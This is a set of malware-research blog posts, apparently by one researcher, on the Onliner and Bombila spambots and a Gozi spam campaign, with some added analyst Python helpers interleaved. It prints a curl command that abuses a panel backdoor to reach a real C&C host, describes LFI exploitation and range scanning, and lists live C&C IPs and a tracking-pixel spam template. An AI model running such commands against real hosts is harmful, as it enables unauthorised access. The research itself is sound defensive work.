<center><a href="https://i.imgur.com/ECTz4HW.png"><img src="https://i.imgur.com/ECTz4HW.png" height=410px></a></center></br>
Funny, the authentication is not like in other panels.</br>
I don't want to go straight to brute force here because, like in almost all panels, there must be a vulnerability somewhere.<br>
Let's come back to the malware communication. As you can see here, the malware downloads some DLLs (ssl and 7zip) from the C&C.</br>
<script src="//pastebin.com/embed_js/974s4Hfi/noheader"></script></br>
I'm not a good pentester, but when you see a full DLL name like ssleay32.dll in a GET parameter, it smells like something bad \o/.</br>
<center><a href="https://i.imgur.com/ulmBF4e.png"><img src="https://i.imgur.com/ulmBF4e.png" height=270px></a></center></br>
<center><iframe src="//giphy.com/embed/18QdBb5NApXB6" width="480" height="270" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
Thanks to that LFI we have access to the whole panel (click on the image below for the full album)</br>
<center><a href="https://imgur.com/a/cytZv"><img src="https://i.imgur.com/HKj9Ave.png" height=410px></a></center></br>
After looking around, I found a reference to another IP: 194.247.13.178. This server hosts another Onliner web panel: hxxp://194.247.13.178/naomi/login.php (click on the image below for the full album)</br></br>
<center><a href="https://imgur.com/a/B7Mug"><img src="https://i.imgur.com/Muhwg6v.png" height=490px></a></center></br>
</br>
Looking at the IP addresses (194.247.13.18 and 194.247.13.178), it seems that those guys really like the "DELTA-X" hoster (Ukraine). </br>
You know, for science, I tried to scan 194.247.13.0-255 with Nmap on port 80, plus some directory guessing with Patator.</br>
And you know what? It worked haha! </br>
<center><iframe src="//giphy.com/embed/fbBNEQbLQdXKU" width="480" height="358" frameBorder="0" class="giphy-embed" allowFullScreen></iframe></center></br>
I found another panel at hxxp://194.247.13.196/asus/login.php . </br>
</br>
<h2>Panel V2 - Good idea - Bad realization</h2>
After the release of the first blog post about Onliner, the botmaster changed some stuff. They started to use IP whitelisting for accessing the panel, they updated some code, they did not patch the LFI, and they added some other vulns x].</br></br>
Now, due to the IP whitelisting, when you try to access the web panel you are kicked out by the PHP script:</br>
<center><a href="https://i.imgur.com/zbSlewh.png "><img src="https://i.imgur.com/zbSlewh.png" height=290px></a></center></br>
The LFI is still here, so we can look at the code. We can see 4 whitelisted IPs (please don't spoil yourself, ignore the first 2 foreach loops haha, I'll discuss them below):</br>
<script src="//pastebin.com/embed_js/hpUBmNjG/noheader"></script>
</br>
It looks bad. I can read the PHP code but I can't access the admin panel. It's time to understand the authentication process. Take a seat, it's wonderful. This is the big picture of the process:</br>
<center><a href="https://i.imgur.com/z6U6igO.png "><img src="https://i.imgur.com/z6U6igO.png" height=590px></a></center></br>
admin.php:</br>
<script src="//pastebin.com/embed_js/vucDx1aT/noheader"></script>
</br>
I cannot explain yet what the hell this is: </br>
if ($_GET['pass']=='Lm7%Dv)ko4q') {</br>
include('login.php');</br>
}</br>
Anyway, the big picture shows us that the situation looks bad: the IP whitelisting is done early. But the function for IP whitelisting is in fact... a backdoor \o/:</br>
<script src="//pastebin.com/embed_js/hNgUvhau/noheader"></script></br>
Remember the $_GET['99'] in the PHP proxy script? Look at the script. To bypass the IP whitelisting when an infected bot contacts the C&C, they use these parameters, $_GET['99'] and $_POST['99']. </br>I just need the code (in config.php), set the POST and GET variables, and I can access the C&C from any IP.</br></br>
curl --data "code=70183619&99=backdoor" "http://194.247.13.178/naomi/admin.php?99=backdoor&mailer=true" > onliner.html
</br></br>
<center><a href="https://i.imgur.com/s7lw9bm.png"><img src="https://i.imgur.com/s7lw9bm.png" height=490px></a></center></br>
</br>
<h2>Bonus</h2>
To finish, I just want to show you, without comment, 2 security features used in the Onliner panel.</br>
Anti-SQLi:</br>
<script src="//pastebin.com/embed_js/F8gYxDvu/noheader"></script>
</br>
Anti-... I don't know what:</br>
<script src="//pastebin.com/embed_js/NHJ75gLF/noheader"></script>
</br></br>
<h2>Malware binary</h2>
The malware itself is in fact a dropper. When you run it, it copies itself into C:\windows\ and re-runs as a service.</br>
</br>
The dropper tries to drop 2 DLLs:
<ul>
<li>http://cnc.com/MailerSMTP/dll.dll : the Spam module</li>
<li>http://cnc.com/CheckerSMTP/dll.dll : the SMTP credentials checker module</li>
</ul>
Those 2 DLLs are XORed with the key </br>[0x37, 0x32, 0x44, 0x45, 0x34, 0x45, 0x35, 0x33, 0x36, 0x46, 0x35, 0x42, 0x32, 0x37, 0x39, 0x36, 0x31, 0x43, 0x43, 0x44, 0x41, 0x37, 0x30, 0x43, 0x32, 0x30, 0x39, 0x37, 0x38, 0x32, 0x46, 0x44, 0x44, 0x35, 0x31, 0x34, 0x43, 0x34, 0x36, 0x37, 0x44, 0x37, 0x39, 0x44, 0x30, 0x39, 0x39, 0x33, 0x38, 0x30, 0x33, 0x35, 0x31, 0x39, 0x43, 0x33, 0x32, 0x41, 0x46, 0x37, 0x33, 0x30, 0x34, 0x30, 0x00]
</br>
</br>
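The key above is 64 ASCII hex digits followed by a NUL. Here is an added analyst-side decoder (not the author's code) that tries both readings of that trailing 0x00, as a 64-byte C-string key and as a raw 65-byte key, and keeps the one that yields a PE image; the repeating-key XOR and the "encoded DLL" stand-in are assumptions, not the real module.</br>

```python
"""Decode the XORed Onliner modules with the key quoted above.

Added example, not the author's code.  Two things are assumptions: that the
loader applies a plain repeating-key XOR, and how it treats the trailing 0x00
(a C-string key of 64 bytes, or a raw 65-byte key).  Both readings are tried
and the one that yields a PE image wins; the "encoded DLL" below is a
constructed stand-in, not a real module.
"""
from __future__ import annotations

import struct

# The key exactly as quoted in the write-up: 64 ASCII hex digits plus a NUL.
KEY_BYTES = bytes([
    0x37, 0x32, 0x44, 0x45, 0x34, 0x45, 0x35, 0x33, 0x36, 0x46, 0x35, 0x42,
    0x32, 0x37, 0x39, 0x36, 0x31, 0x43, 0x43, 0x44, 0x41, 0x37, 0x30, 0x43,
    0x32, 0x30, 0x39, 0x37, 0x38, 0x32, 0x46, 0x44, 0x44, 0x35, 0x31, 0x34,
    0x43, 0x34, 0x36, 0x37, 0x44, 0x37, 0x39, 0x44, 0x30, 0x39, 0x39, 0x33,
    0x38, 0x30, 0x33, 0x35, 0x31, 0x39, 0x43, 0x33, 0x32, 0x41, 0x46, 0x37,
    0x33, 0x30, 0x34, 0x30, 0x00,
])


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; it is its own inverse, so it encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE check: 'MZ' at offset 0 and e_lfanew (0x3C) pointing at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(blob) - 4 and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_module(encoded: bytes) -> tuple[int, bytes] | None:
    """Try the 64-byte (NUL-terminated) reading first, then the raw 65 bytes.
    Returns (key length used, decoded image) or None if neither yields a PE."""
    for key in (KEY_BYTES.rstrip(b"\0"), KEY_BYTES):
        plain = xor_with_key(encoded, key)
        if looks_like_pe(plain):
            return len(key), plain
    return None


def constructed_sample() -> bytes:
    """A 256-byte stand-in for a DLL: DOS header with e_lfanew = 0x80 and a
    PE signature there.  Constructed for the demo, not a real module."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + b"\0" * 0x40 + b"PE\0\0" + b"\xAA" * 0x7C


if __name__ == "__main__":
    # Encode the stand-in the way a loader cycling the C-string key would see it.
    encoded = xor_with_key(constructed_sample(), KEY_BYTES[:64])
    key_len, image = decode_module(encoded)
    print(f"decoded with a {key_len}-byte key, image starts with {image[:2]!r}")
```

With the 65-byte reading, every byte at a key position 64 is left untouched and the cycle drifts by one, so the PE signature check fails after the first key period.</br>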
A little diagram of the malware's communication initialization (the communication is base64-encoded in $_GET parameters):</br>
<center><a href="https://i.imgur.com/KNNlv4C.png"><img src="https://i.imgur.com/KNNlv4C.png" height=560px></a></center></br>
All the modules needed are copied into c:\windows\ too.</br> After installation, the malware waits for commands from the CNC.
Here, an example with the CheckerSMTP Module:</br>
<ul>
<li>The CNC sends the "control account"; this account (mail + password + SMTP server) is used to make sure that the spamming process works. Valid SMTP credentials can be sent to this control account to</li>
<li>The CNC sends a list of SMTP servers plus a list of compromised accounts in 2 zip files: mask.zip and 3746000.zip</li>
<li>The CNC waits until the bot finishes its job, then sends another list of SMTP servers + credentials</li>
</ul>
</br>
The sample is pretty well detected by the AV industry (maybe due to the many debug strings present in the binary).
</br></br>
<h2>Conclusion</h2>
As a reminder, this spambot is used to spread Gozi in Italy and Canada. </br>
Onliner has around 1000 infected bots; they don't spread many samples of the spambot.</br></br>
I look forward to the next update of the panel.
</br>
</br>
<h2>Annex</h2>
Onliner known IPs:
<ul>
<li>194.247.13.8</li>
<li>194.247.13.178</li>
<li>194.247.13.196</li>
<li>91.210.165.163</li>
</ul>
</br>
Spambot sample:
<ul>
<li><a href="https://www.virustotal.com/fr/file/9144917a27453e8d69596a41ea003a5bf7d33334caaa4e67f5f8f9ef9cc3bcd1/analysis/">9144917a27453e8d69596a41ea003a5bf7d33334caaa4e67f5f8f9ef9cc3bcd1</a></li>
<li><a href="http://vxvault.net/ViriFiche.php?ID=32824">B5C87CAB2FF99D1E4B4C3EE897B07869FA8F6A63FBD27018F589C105FAF91FCD</a></li>
</ul>
</br>
Module samples:
<ul>
<li><a href="https://www.virustotal.com/fr/file/3f28a345393273cab4c6cea060644646bf9d0e5b2ebd7dd0c3935fe696223565/analysis/">3f28a345393273cab4c6cea060644646bf9d0e5b2ebd7dd0c3935fe696223565</a></li>
<li><a href="https://www.virustotal.com/fr/file/b535d1eec26275fb53561a7dd3c6454b8036176f8fbdd12a64f2ed4defccb618/analysis/" >b535d1eec26275fb53561a7dd3c6454b8036176f8fbdd12a64f2ed4defccb618</a></li>
</ul>
</br>
Benkow_ (http://www.blogger.com/profile/00709869309686004611)</br>
</br>
Published 2017-01-30, updated 2017-02-05. Post title: БОМБИЛА - БОТНЕТ (BOMBILA - BOTNET)</br>
<H1>Spambot safari #1 - Bombila</H1>
Hey! </br>
</br>
Let's go for a Spambot safari. </br>
There is a lot of malware analysis on the Internet but very little about malware used for spamming (Necurs is a rare exception). But behind every big spam campaign there is a spambot, and this part of the campaign is often technically weak.</br></br>
It's easy to find a spambot. Most of the time, botmasters make the mistake of spreading the spambot's binary via the spam botnet itself. Because of the malware's communication, this mistake exposes the spambot architecture and allows us to analyze the CNC part.</br>
Looking for malware with SMTP communication on public sandboxes is another good way to find spambot samples.</br>
</br>
Here, I'll try to describe the "Bombila" spambot (БОМБИЛА). </br>
This malware was used to spread Teslacrypt in 2016 (if you want to understand how weak spamming campaigns are, take a look at: <a href="https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/">https://thisissecurity.net/2016/03/02/lets-ride-with-teslacrypt/</a>)</br></br>
I'll try to give an overview of this malware.</br>
Sample: <a href="http://vxvault.net/ViriList.php?MD5=5647F30013E4BDECF134157BD3C6F7B0">6aa5fd384fbfe271a5000397e2e0c9d9e06dd5d041488e4f2de7ae3a4eb1589d</a></br></br>
<H2>Silent_SMTP_Bruter.exe</H2>
The malware itself (Silent_SMTP_Bruter) is not really interesting and seems to be in development: </br>
a lot of bugs, poor string obfuscation, OutputDebugStrings, a log file created in C:\log.txt...</br>
Persistence is done via CurrentVersion\Run; there is no self-replication or hidden feature (the malware stays where you launch it). After some connection checks, the malware contacts the CNC (HTTP). If you kill the process with the task manager, the malware stops working.
</br></br>
<img src="https://i.imgur.com/Luvdo1v.png" height=54px ></br>
<center>Wow! So much obfuscation...</br></center></br>
<img src="https://i.imgur.com/5FbUHTC.png" height=454px ></br>
<center>"Silent_SMTP_Bruter" string is present in the PACKAGEINFO</center></br></br>
As usual, the malware is composed of an SMTP bruteforce module and an SMTP spam module.</br>
The main module tries to contact a gate "cmd.php" in 2 different ways:
<ul>
<li>A POST request ($_POST['status']) every 5 minutes to send the bot status</li>
<li>A GET request without parameters to retrieve new orders</li>
</ul>
</br>
<H2>Not so boring malware</H2>
But the best part is not in the malware itself; it's the icon of the malware \o/. You can observe a funny behaviour: when you rename the binary, the binary's icon changes. It takes icons already present in the system icon cache. The hash is still the same (works on an up-to-date Windows 10 :]). </br>
It can be used to fool victims because the malware takes icons like a directory, Word, txt etc. </br>
<img src="https://i.imgur.com/S0vF11n.png" height=140px ></br>
</br>
If we extract the icon from the binary's resources, the bug can be reproduced with the .ico file alone:</br>
<center><img src="https://i.imgur.com/h3Xnuu7.png" height=160px ></center></br></br>
It's a very small icon file (78 bytes)</br></br>
<img src="https://i.imgur.com/SV76AL9.png" height=200px ></br>
In red, the ICO header, composed of 2 structures: <a href="https://msdn.microsoft.com/en-us/library/ms997538.aspx">ICONDIR and ICONDIRENTRY</a></br>
In green, the bitmap header, the <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/dd183376(v=vs.85).aspx">BITMAPINFOHEADER</a> structure</br>
In blue, the RGB color data</br>
</br>
It seems that, after a MapViewOfFile, user32 misparses the bitmap data and picks a "random" icon from the icon cache (C:\Users\login\AppData\Local\Microsoft\Windows\Explorer).</br>
I'm still working on that; I'll try to write a post about how to reverse these kinds of UI tricks without getting suicidal tendencies \o/.</br>
Thanks a lot to <a href="https://twitter.com/antelox">@Antelox</a> for his precious help :]
</br></br>
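To show what such a 78-byte icon looks like on the wire, here is an added consistency checker (not the author's or the malware's code) that walks ICONDIR, ICONDIRENTRY and BITMAPINFOHEADER and flags an icon whose headers promise more pixel data than the file carries. The two icons are constructed: the "bad" one only shares its 6 + 16 + 40 + 16 byte layout with the real file, its field values are an assumption.</br>

```python
"""Sanity-check the ICO structures behind the Bombila icon trick.

Added example, not the author's or the malware's code.  It walks the three
structures named above (ICONDIR, ICONDIRENTRY, BITMAPINFOHEADER) and then
checks that the pixel data the headers promise is really present, which is the
kind of inconsistency a 78-byte icon cannot hide.  The two icons below are
constructed: BAD_ICO only shares its 6 + 16 + 40 + 16 byte layout with the
real file, its field values are an assumption.
"""
from __future__ import annotations

import struct

ICONDIR = struct.Struct("<HHH")            # idReserved, idType, idCount
ICONDIRENTRY = struct.Struct("<BBBBHHII")  # w, h, colors, reserved, planes, bpp, size, offset
BITMAPINFOHEADER = struct.Struct("<IiiHHIIiiII")


def _row_bytes(width: int, bpp: int) -> int:
    """DIB scanlines are padded to 32-bit boundaries."""
    return ((width * bpp + 31) // 32) * 4


def check_ico(data: bytes) -> list[str]:
    """Return the inconsistencies found; an empty list means the headers agree
    with each other and with the number of bytes actually in the file."""
    issues: list[str] = []
    if len(data) < ICONDIR.size + ICONDIRENTRY.size:
        return ["file shorter than ICONDIR + one ICONDIRENTRY"]
    reserved, idtype, count = ICONDIR.unpack_from(data, 0)
    if reserved != 0 or idtype != 1:
        issues.append(f"bad ICONDIR: reserved={reserved} type={idtype}")
    if count != 1:
        issues.append(f"idCount={count}, only the first entry is checked")
    w, h, _, _, _, bpp, size, offset = ICONDIRENTRY.unpack_from(data, ICONDIR.size)
    w, h = w or 256, h or 256                       # 0 means 256 in ICONDIRENTRY
    if offset + size > len(data):
        issues.append(f"entry claims {size} bytes at offset {offset}, file has {len(data)}")
    if len(data) < offset + BITMAPINFOHEADER.size:
        issues.append("no room for a BITMAPINFOHEADER at the image offset")
        return issues
    bi = BITMAPINFOHEADER.unpack_from(data, offset)
    bi_size, bi_w, bi_h, _, bi_bpp, compression, _, _, _, clr_used, _ = bi
    if bi_size != BITMAPINFOHEADER.size:
        issues.append(f"biSize={bi_size}, expected 40")
    if compression != 0:
        issues.append(f"biCompression={compression}, icons are normally BI_RGB (0)")
    if (bi_w, bi_h) != (w, 2 * h):                  # biHeight covers XOR + AND bitmaps
        issues.append(f"bitmap {bi_w}x{bi_h} vs entry {w}x{h} (biHeight should be 2*height)")
    if bpp and bi_bpp != bpp:
        issues.append(f"wBitCount={bpp} vs biBitCount={bi_bpp}")
    palette = (clr_used or (1 << bi_bpp)) * 4 if bi_bpp <= 8 else 0
    need = palette + _row_bytes(w, bi_bpp) * h + _row_bytes(w, 1) * h
    have = len(data) - offset - BITMAPINFOHEADER.size
    if have < need:
        issues.append(f"pixel data truncated: {have} bytes present, {need} needed")
    return issues


def build_ico(width: int, height: int, bpp: int, pixels: bytes) -> bytes:
    """Assemble a single-image ICO (used only to construct the test inputs)."""
    dib = BITMAPINFOHEADER.pack(40, width, 2 * height, 1, bpp, 0, len(pixels), 0, 0, 0, 0)
    entry = ICONDIRENTRY.pack(width, height, 0, 0, 1, bpp, len(dib) + len(pixels), 22)
    return ICONDIR.pack(0, 1, 1) + entry + dib + pixels


# A sound 1x1 32-bit icon (4 bytes of BGRA + a 4-byte AND row), and a 78-byte
# icon that announces a 16x16 32-bit image but carries only 16 bytes of pixels.
GOOD_ICO = build_ico(1, 1, 32, b"\x00\x00\xff\x00" + b"\x00" * 4)
BAD_ICO = build_ico(16, 16, 32, b"\x00" * 16)

if __name__ == "__main__":
    for name, ico in (("good", GOOD_ICO), ("bad", BAD_ICO)):
        print(name, len(ico), "bytes:", check_ico(ico) or "consistent")
```

A rule like this is cheap to run over the icon resources of every executable dropped by mail, since a legitimate icon of a few dozen bytes is rare.</br>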
<H2>Crack the bot</H2>
During the Teslacrypt analysis I was able to dump the web panel. So, why not try to patch the bot with my own CNC to play with all the features?
</br>
For that, we have to understand where the CNC is stored in the binary and patch it.</br>
There is a good resource about that on <a href="http://www.xylibox.com/2013/01/how-to-hex-malware-and-make-builder.html">Xylibox</a>.
But in this case I'll use an easier way :]. In the binary we can see that the CNC is "obfuscated" (loc_4480D3)
</br>
<script src="https://pastebin.com/embed_js/i5tyt8Qd/noheader"></script>
</br>
<script src="https://pastebin.com/embed_js/FvfGWY0z/noheader"></script>
</br>
It's now easy to make a dirty Python script to encode our CNC and patch the binary (offset 0x58488).
</br>
Due to a stupid parsing error, the CNC must look like "http://domain.com/folder", without the trailing slash.
</br>
<center><img src="https://i.imgur.com/eGE0yNI.png" height=480px ></center></br>
<center><img src="https://i.imgur.com/cDMVnpb.png" height=160px ></center></br>
<img src="https://i.imgur.com/Kk8od2g.png" height=420px ></br>
You can now control the bot and explore all the features \o/.
</br></br></br>
<H2>Panel Overview</H2>
<center><img src="https://i.imgur.com/4LoCMmT.png" height=230px ></center></br>
<center><img src="https://i.imgur.com/sooqbHo.png" height=420px ></center></br>
The source code is a real mess. It looks like the panel is a combination of 2 panels.</br>
For example, there are 3 footers in index.php:</br>
<script src="https://pastebin.com/embed_js/wtQAnn01/noheader"></script>
</br>
Some comments refer to other projects:</br>
<center><img src="https://i.imgur.com/CLQ2OF0.png" height=420px ></center></br>
</br>
It's time for a quick overview (I've tried to do a quick and dirty English version (thanks <a href="http://twitter.com/KodaES">@KodaES</a> :D); put your cursor on the image for the translated version):</br>
The home page:</br>
<a href="https://i.imgur.com/F2lOzTD.png"><img src="https://i.imgur.com/F2lOzTD.png" onmouseover="this.src='https://i.imgur.com/XeYll3U.png'" onmouseout="this.src='https://i.imgur.com/F2lOzTD.png'" height=300px /></a></br>
From this page, you can:
<ul>
<li>Upload emails lists</li>
<li>Upload subject, messages, "from", header etc</li>
<li>Retrieve statistics about the spam campaign</li>
<li>Retrieve some statistics about infected bots</li>
<li>Configure the campaign</li>
</ul>
<a href="https://i.imgur.com/L0azcnl.png"><img src="https://i.imgur.com/L0azcnl.png" onmouseover="this.src='https://i.imgur.com/HG83qmC.png'" onmouseout="this.src='https://i.imgur.com/L0azcnl.png'" height=380px /></a></br>
</br>
I could not find any bot list or campaign details directly from the web panel.</br>
Some pages are only accessible by reading the source code.</br>
In fact, index.php is a big switch case: </br>
</br>
<script src="https://pastebin.com/embed_js/sX8F4yAt/noheader"></script>
</br>
</br>
For example: the bots list (index.php?act=work): </br>
<a href="https://i.imgur.com/O01uiwa.png"><img src="https://i.imgur.com/O01uiwa.png" onmouseover="this.src='https://i.imgur.com/DPYo72N.png'" onmouseout="this.src='https://i.imgur.com/O01uiwa.png'" height=190px /></a></br>
</br>
Search engine:</br>
<a href="https://i.imgur.com/P4wSSgQ.png"><img src="https://i.imgur.com/P4wSSgQ.png" onmouseover="this.src='https://i.imgur.com/3p1iJZD.png'" onmouseout="this.src='https://i.imgur.com/P4wSSgQ.png'" height=155px /></a></br>
There is no dropping or backdoor feature. This malware is only for spam purposes.
</br></br>
<H2>After Teslacrypt ?</H2>
</br>
I've tried to find other samples of this malware after the end of Teslacrypt. </br>
I've found <a href="http://cybercrime-tracker.net/index.php?search=spnsmtpchtr.com%2Findex_old.php">another panel</a> but nothing else. </br>
<img src="https://i.imgur.com/J4ymU3d.jpg" height=280px ></br>
</br>
I think it should be easy to retrieve new samples via VTI.
</br>
</br>
Some numbers to conclude (based on webstat files found on the CNC):
</br>
From December 2015 to February 2016, Bombila :
<ul>
<li>was composed of ~10 000 bots</li>
<li>has sent at least 10 million emails</li>
</ul>
</br>
</br>
Thanks for reading :]
</br>
<img src="https://68.media.tumblr.com/ad74a2134bc497766167d41effb76b83/tumblr_o0kw7uXPjy1rflj6co2_r1_500.gif" height=280px ></br>
Benkow_ (http://www.blogger.com/profile/00709869309686004611)</br>
</br>
Published 2017-01-20, updated 2018-12-04.</br>
<H1>A journey inside Gozi campaign</H1>
</br>
Gozi is a <a href="http://www.seculert.com/blogs/ursnif-deep-technical-dive">well known</a> banking trojan. In this blogpost, I'll try to take a deeper look at a recent campaign to understand how it works.
<blockquote class="twitter-tweet" data-lang="fr"><p lang="en" dir="ltr"><a href="https://twitter.com/dhlexpressuk">@dhlexpressuk</a> <a href="https://twitter.com/hashtag/phishing?src=hash">#phishing</a><br>Subj:DHL Italy - documenti importanti<br>File:HK5863.js<br>MD5:f356cb644971384240e05a5d22cd149f<br>VT:4/50<a href="https://twitter.com/malwrhunterteam">@malwrhunterteam</a> <a href="https://t.co/hNWULLHwq0">pic.twitter.com/hNWULLHwq0</a></p>— guga (@illegalFawn) <a href="https://twitter.com/illegalFawn/status/795643761325932546">7 November 2016</a></blockquote>
</br>
Let's try to understand the whole infection chain, from the spambot to the Gozi dropper.
</br>
<h2>The spambot - Onliner</h2>
<center><a href="https://i.imgur.com/WUpikxU.png"><img src="https://i.imgur.com/WUpikxU.png" width="600px"></a></center>
This Gozi campaign is based on a SpamBot called <a href="http://cybercrime-tracker.net/index.php?search=onliner">"Onliner"</a>. As we can see in the C&C Panel, this spambot has 2 main features:
<ul>
<li>
Checker: You provide a list of compromised SMTP accounts to the spambot and some bots test whether the credentials are valid.</br>
<a href="https://i.imgur.com/9Xi9eDj.png"><img src="https://i.imgur.com/9Xi9eDj.png" height="90%" width="90%"></a>
</li>
</ul>
I've found around 80 million compromised SMTP accounts on the checker module. Some of them come from public leaks (like Badoo, LinkedIn...) and some others come from unknown sources.</br>
<ul>
<li>
Mailer: The spam mailer:
<a href="https://i.imgur.com/GsO9tGA.png"><img src="https://i.imgur.com/GsO9tGA.png" height="500px"> </a>
</br>
<a href="https://i.imgur.com/Ktesp2T.png"><img src="https://i.imgur.com/Ktesp2T.png" height="500px"> </a>
</br>
Mailer requests details:
<textarea rows="20" cols="80">
//Статусы ошибок ОТВЕТА СЕРВЕРА
//-1 Бот заблокирован по IP
//-2 Нет активной рассылки
//-3 Данного бота нет! в списке активных (должно срабатывать толлько при чей-либо попытке подделать запрос).
//-4 Нет аккаунтов
//-5 Не удалось загрузить ssl библиотеку
//-6 Бот прислал статус ошибки (Какую либо)
//-7 Прошлый статус у бота не Done, новую рассылку получить нельзя
//-8 Бот заблокирован по количеству онлайн работающих ботов
//-9 Бот заблокирован по стране
//-10 В таблице нет индексов. (Такого быть не должно! Нулевой индекс есть всегда(смещение от старта))
//-11 Нет больше блоков
//Статусы ошибок ЗАПРОСА БОТА
//-1 Блокировка по таймауту 6 минут (не удалось отправить ни одного письма за 6 минут)
//-2 Ошибка загрузки базы получателя
//-3 Нет папки для загрузки zip архива с заданием
//-4 Не удалось загрузить списо аккаунтов
//-6 Блокировка по таймауту
Translation:
// SERVER RESPONSE error statuses
// -1 Bot blocked by IP
// -2 No active mailing campaign
// -3 This bot is not in the active list (should only trigger when someone tries to forge a request)
// -4 No accounts
// -5 Could not load the SSL library
// -6 Bot reported an error status (of any kind)
// -7 Bot's previous status is not Done, a new mailing cannot be issued
// -8 Bot blocked because of the number of bots working online
// -9 Bot blocked by country
// -10 The table has no indexes (this should never happen! index zero always exists (offset from start))
// -11 No more blocks
// BOT REQUEST error statuses
// -1 Blocked on a 6-minute timeout (failed to send a single email in 6 minutes)
// -2 Error loading the recipient database
// -3 No folder to download the zip archive with the task into
// -4 Could not load the account list
// -6 Blocked on timeout
</textarea>
</li>
</ul>
If we look at the changelog, this spambot seems to be quite young:
</br>
<a href="https://i.imgur.com/NnNoJti.png"><img src="https://i.imgur.com/NnNoJti.png" height="470px"> </a>
</br>
As we can see in the PHP source code, it seems that an SMTPBruteForcer exists: </br>
<a href="https://i.imgur.com/E9GsFLC.png"><img src="https://i.imgur.com/E9GsFLC.png" height="90%" width="90%"></a>
</br></br>
<h2>Gozi spam</h2>
<h3>Fingerprinting campaign</h3>
Let's focus on the Gozi campaign. This campaign is quite interesting. First of all, the botmaster(s) start with a fingerprinting round. </br>
They send some random emails with a hidden image inside:
</br>
<textarea rows="20" cols="80">
<IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="mobile">
Hello, Champ {friend|champion\enthusiast}! How {are you|is your day}?
{My name is|I'm} Natalia. Do you believe in {fate|destiny}?
Love is inseparable fellow of hope. {Sorry for|Pardon} my English, but I hope you'll {understand|get} that I let my {passion|flame} speak for me.
I wish you realize that it's not just some words - it's a faith that lies within my soul.
I hope you won't leave it at just {cursory reading|skimming} of the letter, and will {see|recognize} my true feelings behind it.
It like I'm sending you {piece|part} of my soul. It's really important to me!
Because I'm looking for a serious man who's ready to build {meaningful|committed} {relationship|partnership}.
I wanna go {on|through} a journey from a beautiful bride to a caring mother.
I dream to meet {an honest|a sincere} man, who will take me to {mysterious|secret} {places|lands} and show me a whole new world.
Don't give me your sympathy, give your feelings instead!
I hope to see {through|in} your {response|answer} that your interest in me has a depth. Eagerly awaiting for your {letter|message} and {photos|pictures}!
Bye-bye!
</textarea>
</br>
When a victim opens this email, some information is leaked to "http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}". This information (User-Agent, IP etc.) is useful to the botmaster because he can identify specific groups of users (Windows users for example).
</br>
The script used for victims classification:</br>
<script src="//pastebin.com/embed_js/ZLagdg3E/noheader"></script>
</br>
Output for Windows users:</br>
<script src="//pastebin.com/embed_js/MDSbQtBj/noheader"></script>
</br>
This spam campaign is maybe used for test purposes or for target identification.
</br></br>
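The pixel URL above is written in the panel's spintax: each {a|b|c} group is one random pick per message and {email} is filled in per recipient, so one template renders into thousands of distinct URLs. As an added example (not the author's or the spambot's code), here is a converter from that spintax to a regex, which is what a defender needs to hunt the beacon in proxy or mail-gateway logs; the log lines are constructed.</br>

```python
"""Build a search pattern from the spambot's template spintax.

Added example, not the author's or the spambot's code.  Every {a|b|c} group is
one random pick per message and {email}/{email2} are filled in per recipient,
so one template renders into thousands of distinct messages; the regex built
here matches all of them, which is what is needed to hunt the tracking-pixel
URL in proxy or mail-gateway logs.  The log lines are constructed.
"""
from __future__ import annotations

import re
from math import prod

TOKEN = re.compile(r"\{([^{}]*)\}")   # one {...} group; the templates are not nested
PLACEHOLDERS = {"email", "email2"}     # per-recipient substitutions used by the panel

# Tracking pixel URL exactly as it appears in the fingerprinting template.
PIXEL = ("http://conceptcreationnv.com/2015/cgi-bin/"
         + "{1|2|3|4|5|6|7|8|9}" * 5 + ".gif?{email}")


def spintax_to_regex(template: str) -> str:
    """Literal text is escaped, {a|b|c} becomes (?:a|b|c), and a placeholder
    becomes a named group (or a backreference when it appears a second time)."""
    out: list[str] = []
    pos, seen = 0, set()
    for m in TOKEN.finditer(template):
        out.append(re.escape(template[pos:m.start()]))
        body = m.group(1)
        if body in PLACEHOLDERS:
            # the panel substitutes the same address everywhere, so a repeat
            # must equal the first capture
            out.append(f"(?P={body})" if body in seen else rf'(?P<{body}>[^\s"<>]+)')
            seen.add(body)
        else:
            alts = "|".join(re.escape(alt) for alt in body.split("|"))
            out.append(f"(?:{alts})")
        pos = m.end()
    out.append(re.escape(template[pos:]))
    return "".join(out)


def variant_count(template: str) -> int:
    """Number of distinct renderings, placeholders excluded."""
    return prod(len(m.group(1).split("|"))
                for m in TOKEN.finditer(template) if m.group(1) not in PLACEHOLDERS)


def find_beacons(log_lines: list[str], template: str = PIXEL) -> list[dict[str, str]]:
    """Return one record per log line that carries a rendered template."""
    rx = re.compile(spintax_to_regex(template))
    hits = []
    for line in log_lines:
        m = rx.search(line)
        if m:
            hits.append({"line": line, **m.groupdict()})
    return hits


# Constructed proxy log lines: one beacon, one unrelated fetch from the same host.
SAMPLE_LOG = [
    '10.0.0.7 - - [07/Nov/2016:09:12:31 +0100] "GET http://conceptcreationnv.com/2015/cgi-bin/35719.gif?victim@example.com HTTP/1.1" 200 43',
    '10.0.0.9 - - [07/Nov/2016:09:13:02 +0100] "GET http://conceptcreationnv.com/2015/cgi-bin/logo.gif HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    print(variant_count(PIXEL), "distinct pixel names per recipient")
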